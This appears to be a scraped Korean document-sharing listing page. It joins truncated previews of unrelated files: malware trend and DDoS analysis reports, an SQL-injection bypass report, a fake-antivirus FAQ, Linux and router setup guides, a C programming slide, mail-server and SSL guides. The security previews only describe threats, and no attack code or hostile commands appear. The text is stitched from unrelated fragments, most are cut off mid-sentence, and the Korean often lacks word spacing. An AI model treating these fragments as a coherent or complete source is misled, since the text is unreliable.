More informationⅠ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top 20 이다 년 2 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-
Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top 20 이다. 2010 년 2 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1] 악성코드감염보고 Top 20 2010년 2월의악성코드감염보고는 Win32/Induc이
More information네이버블로그 :: 포스트내용 Print VMw are 에서 Linux 설치하기 (Centos 6.3, 리눅스 ) Linux 2013/02/23 22:52 /carrena/ VMware 에서 l
VMw are 에서 Linux 설치하기 (Centos 6.3, 리눅스 ) Linux 2013/02/23 22:52 http://blog.naver.com /carrena/50163909320 VMware 에서 linux 설치하기 linux 는다양한버전이존재합니다. OS 자체가오픈소스이기때문에 redhat fedora, 우분투, centos 등등 100 가지가넘는버전이존재함
More information아래 항목은 최신( ) 이미지를 모두 제대로 설치하였을 때를 가정한다
공유기사용환경에서 MNC-V100 환경설정하기 다음설명은 AnyGate GW-400A (Http://www.anygate.co.kr) 를사용하는네트워크환경에서 MNC-V100 을연결하여사용하는법을설명합니다. 공유기내부네트워크환경설정공유기를사용하는환경에서공유기의설정을아래그림과같이설정하시면 MNC-V100의설정을변경하지않아도모비캠과연결할수있습니다. ( 공유기의환경을변경하기어려운경우에는
More information1
3.3 DDoS 분석보고서 2011.03.04 잉카인터넷 시큐리티대응센터 1. 분석개요 1.1. 목적 2011 년 3 월 3 일접수된 DDoS 악성샘플에대한분석을수행합니다. 1.2. 분석환경 :: Windows XP SP3 Kor 1.3. 분석에사용된프로그램 :: Process Explorer :: Tcpview :: Ollydbg 1.4. 패턴버전및업데이트로그
More information*****
Korea Internet & Security Agency 21 2 본 보고서 내용의 전부나 일부를 인용하는 경우에는 반드시 출처 [자료:한국인터넷진흥원 인터넷침해대응센터]를 명시하여 주시기 바랍니다. CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 34 37 38 1 212 Bot
More informationMicrosoft Word - AntiVirus 2008_FAQ.doc
AntiVirus XP 2008 Fake Anti-Virus FAQ 질문 1. AntiVirus XP 2008 은어떤프로그램인가요? Antivirus 2008 은시스템에설치될경우시스템을검사하여악성코드에감염된것처럼허위로검사결과를사용자에게보여주고 치료하기위해서결제를유도함으로써금전적이득을취하기위한허위백신이다. 질문 2. AntiVirus XP 2008 은어떤경로를통해유포되나요?
More informationMicrosoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc
분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.
More informationMicrosoft PowerPoint - chap02-C프로그램시작하기.pptx
#include int main(void) { int num; printf( Please enter an integer "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 을 작성하면서 C 프로그램의
More informationPowerPoint 프레젠테이션
B Type 가이드 가지고있는도메인사용 + 인증서구매대행절차 1. 신청하기. 네임서버변경 / 확인 - 네임서버변경 - 네임서버변경확인 3. 인증심사메일에회신하기 - 메일주소확인 - 메일주소변경 - 인증심사메일서명 4. Ver. 015.10.14 가지고있는도메인사용 + 인증서구매대행절차 도메인은가지고있으나인증서가없는경우소유한도메인주소로 를오픈하고인증서는 Qoo10
More information목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault
사용자매뉴얼 JetFlash Vault 100 ( 버전 1.0) 1 목차 1. 시스템요구사항... 3 2. 암호및힌트설정 ( 윈도우 )... 3 3. JetFlash Vault 시작하기 ( 윈도우 )... 7 4. JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault 찾아보기... 10 JetFlash
More informationTTA Journal No.157_서체변경.indd
표준 시험인증 기술 동향 FIDO(Fast IDentity Online) 생체 인증 기술 표준화 동향 이동기 TTA 모바일응용서비스 프로젝트그룹(PG910) 의장 SK텔레콤 NIC 담당 매니저 76 l 2015 01/02 PASSWORDLESS EXPERIENCE (UAF standards) ONLINE AUTH REQUEST LOCAL DEVICE AUTH
More information2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1
악성코드은닉사이트탐지 동향보고서 17 년상반기 1 ` 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 4 2.1 악성코드유포지현황 4 - 유포지탐지현황 4 - 대량경유지가탐지된유포지 TOP10 5 - 악성코드취약점및취약한 S/W 악용현황 6 - 악성코드유형별비율 7 - 위협 IP 및도메인현황 8 2.2 악성코드경유지현황 9 - 경유지탐지 업종별비율
More information커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서
커알못의 커널 탐방기 2015.12 이 세상의 모든 커알못을 위해서 개정 이력 버전/릴리스 0.1 작성일자 2015년 11월 30일 개요 최초 작성 0.2 2015년 12월 1일 보고서 구성 순서 변경 0.3 2015년 12월 3일 오탈자 수정 및 글자 교정 1.0 2015년 12월 7일 내용 추가 1.1 2015년 12월 10일 POC 코드 삽입 및 코드
More information로거 자료실
redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...
More informationASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하
Security Trend ASEC REPORT VOL.79 July, 2016 ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationserver name>/arcgis/rest/services server name>/<web adaptor name>/rest/services ArcGIS 10.1 for Server System requirements - 지
ArcGIS for Server (Windows) 설치가이드 ArcGIS 10.2 for Server 설치변경사항 1 설치 간편해진설치 -.Net Framework나 Java Runtime 요구하지않음 - 웹서버 (IIS, WebSphere ) 와별도로분리되어순수하게웹서비스기반의 GIS 서버역할 - ArcGIS Server 계정을이용한서비스운영. 더이상 SOM,
More information인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷
인터넷비즈니스의안심코드, AhnLab Online Security 2.0 멀티브라우저지원! 블루투스키보드지원! 메모리해킹방어! 웹페이지변조및스크린캡처차단! 정보유출걱정없이비즈니스가완성됩니다 보안전용브라우저 AOS Secure Browser 키보드보안서비스 AOS anti-keylogger 온라인 PC 방화벽 AOS firewall 온라인통합방역서비스 AOS
More information메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월
메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. qmail, SPF 인증모듈설치
More informationⅠ. 이달의 보안 동향 1. 악성코드 동향 아래 표는 악성코드의 주요 동향을 파악하기 위하여, 악성코드별 변종을 종합한 악성코드 대표진단명 감염보고 Top20이다. 악성코드 통계 2010년 10월 악성코드 통계현황은 다음과 같다. [표 1-2] 악성코드 대표진단명 감염
Ⅰ. 이달의 보안 동향 1. 악성코드 동향 아래 표는 악성코드의 주요 동향을 파악하기 위하여, 악성코드별 변종을 종합한 악성코드 대표진단명 감염보고 Top20이다. 악성코드 통계 2010년 10월 악성코드 통계현황은 다음과 같다. [표 1-2] 악성코드 대표진단명 감염보고 Top 20 2010년 10월의 감염보고 건수는 Win-Trojan/Agent가 총 856,917건
More information이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론
이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론 2. 관련연구 2.1 MQTT 프로토콜 Fig. 1. Topic-based Publish/Subscribe Communication Model. Table 1. Delivery and Guarantee by MQTT QoS Level 2.1 MQTT-SN 프로토콜 Fig. 2. MQTT-SN
More information< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10
(https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)
More information제목 레이아웃
웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya
More informationⅠ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드별변종을종합한감염보고순위를악성코드대표진 단명에따라정리한것이다. 이를통해악성코드의동향을파악할수있 다 년 1 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [
Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드별변종을종합한감염보고순위를악성코드대표진 단명에따라정리한것이다. 이를통해악성코드의동향을파악할수있 다. 2011 년 1 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1] 악성코드감염보고 Top 20 2011년 1월의악성코드감염보고는 TextImage/Autorun이
More informationEDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-
EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.
More information목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리... 2 2. 공격 기법 및 기본 개념... 3 2.1. Heap Spray... 3 2.2. Font... 4 3. 공 격..
취약점 분석 보고서 [ Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow - CVE-2012-1535 ] 2012-08-23 RedAlert Team 안상환 목 차 1. 개 요... 1 1.1. 배경... 1 1.2. 요약... 1 1.3. 정보... 2 1.4. 대상시스템... 2 1.5. 원리...
More informationvRealize Automation용 VMware Remote Console - VMware
vrealize Automation 용 VMware Remote Console VMware Remote Console 9.0 이문서는새버전으로교체되기전까지나열된각제품버전및모든이후버전을지원합니다. 이문서에대한최신버전을확인하려면 http://www.vmware.com/kr/support/pubs 를참조하십시오. KO-002230-00 vrealize Automation
More informationWindows Live Hotmail Custom Domains Korea
매쉬업코리아2008 컨퍼런스 Microsoft Windows Live Service Open API 한국 마이크로소프트 개발자 플랫폼 사업 본부 / 차세대 웹 팀 김대우 (http://www.uxkorea.net 준서아빠 블로그) Agenda Microsoft의 매쉬업코리아2008 특전 Windows Live Service 소개 Windows Live Service
More information메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix spf-filter 년 6 월
메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix 2.7.1 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. postfix,
More informationPowerPoint 프레젠테이션
Traffic monitoring for security anomaly detection 바이러스연구실 최원혁 바이러스사례 (1) 2001.07 CodeRed 최초의패킷형바이러스. IIS 의버퍼오버플로어취약점을이용해서바이러스를메모리에상주후, 무작위로 PC 를선별버퍼오버플로어패킷을보내어취약점이존재할경우다시바이러스에감염되는과정을반복함 (2) 2001.08 CodeRed_II
More information컴퓨터관리2번째시간
Company 컴퓨터 관리 참고 자료 PC 운영체제 POST 기능 :, ROM BIOS ( : [F8]) 1. Windows XP Windows XP 사용자 계정 :,,, 강화된 디지털 미디어 지원 기능 : (Windows Movie Maker), CD (Windows Media Player), Windows 홈 네트워크 기능 :, 강화된 시스템 관리 :,
More informationwtu05_ÃÖÁ¾
한 눈에 보는 이달의 주요 글로벌 IT 트렌드 IDG World Tech Update May C o n t e n t s Cover Story 아이패드, 태블릿 컴퓨팅 시대를 열다 Monthly News Brief 이달의 주요 글로벌 IT 뉴스 IDG Insight 개발자 관점에서 본 윈도우 폰 7 vs. 아이폰 클라우드 컴퓨팅, 불만 검증 단계 돌입 기업의
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture1 Malware Analysis #1 Agenda 악성코드정적분석 악성코드분석 악성코드정적분석 정적분석 임의의코드또는응용프로그램을실행하지않고분석 ASCII 문자열 (ex. URL) API 리스트 Packing VT 기타등등 정적분석 : 파일식별 악성으로의심되는파일의형태식별 file
More information슬라이드 제목 없음
MS SQL Server 마이크로소프트사가윈도우운영체제를기반으로개발한관계 DBMS 모바일장치에서엔터프라이즈데이터시스템에이르는다양한플랫폼에서운영되는통합데이터관리및분석솔루션 2 MS SQL Server 개요 3.1 MS SQL Server 개요 클라이언트-서버모델을기반으로하는관계 DBMS 로서윈도우계열의운영체제에서만동작함 오라클관계 DBMS 보다가격이매우저렴한편이고,
More information[Brochure] KOR_TunA
LG CNS LG CNS APM (TunA) LG CNS APM (TunA) 어플리케이션의 성능 개선을 위한 직관적이고 심플한 APM 솔루션 APM 이란? Application Performance Management 란? 사용자 관점 그리고 비즈니스 관점에서 실제 서비스되고 있는 어플리케이션의 성능 관리 체계입니다. 이를 위해서는 신속한 장애 지점 파악 /
More informationWindows 10 General Announcement v1.0-KO
Windows 10 Fuji Xerox 장비와의호환성 v1.0 7 July, 2015 머리말 Microsoft 는 Windows 10 이 Windows 자동업데이트기능을통해예약되어질수있다고 6 월 1 일발표했다. 고객들은 윈도우 10 공지알림을받기 를표시하는새로운아이콘을알아차릴수있습니다. Fuji Xerox 는 Microsoft 에서가장최신운영시스템인 Windows
More informationThe Pocket Guide to TCP/IP Sockets: C Version
인터넷프로토콜 03 장 도메인네임시스템과주소 패밀리 (IPv4-IPv6 서비스 ) 1 목차 제 3 장도메인네임시스템과주소패밀리 3.1 도메인네임주소를숫자주소로매핑하기 3.2 IP 버전에무관한주소-범용코드의작성 3.3 숫자주소에서도메인네임주소획득하기 2 getaddrinfo() 를활용한주소 범용 (Generic) 코드 주소범용 (Generic) 코드란? 주소버전
More information목차 데모 홖경 및 개요... 3 테스트 서버 설정... 4 DC (Domain Controller) 서버 설정... 4 RDSH (Remote Desktop Session Host) 서버 설정... 9 W7CLIENT (Windows 7 Client) 클라이얶트 설정
W2K8 R2 RemoteApp 및 Web Access 설치 및 구성 Step-By-Step 가이드 Microsoft Korea 이 동 철 부장 2009. 10 페이지 1 / 60 목차 데모 홖경 및 개요... 3 테스트 서버 설정... 4 DC (Domain Controller) 서버 설정... 4 RDSH (Remote Desktop Session Host)
More informationHLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :
HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : ios 3.0 이상 - 콘텐츠형식 : MP4 (H264,AAC ), MP3 * 디바이스별해상도,
More information다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");
다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher
More information6강.hwp
----------------6강 정보통신과 인터넷(1)------------- **주요 키워드 ** (1) 인터넷 서비스 (2) 도메인네임, IP 주소 (3) 인터넷 익스플로러 (4) 정보검색 (5) 인터넷 용어 (1) 인터넷 서비스******************************* [08/4][08/2] 1. 다음 중 인터넷 서비스에 대한 설명으로
More information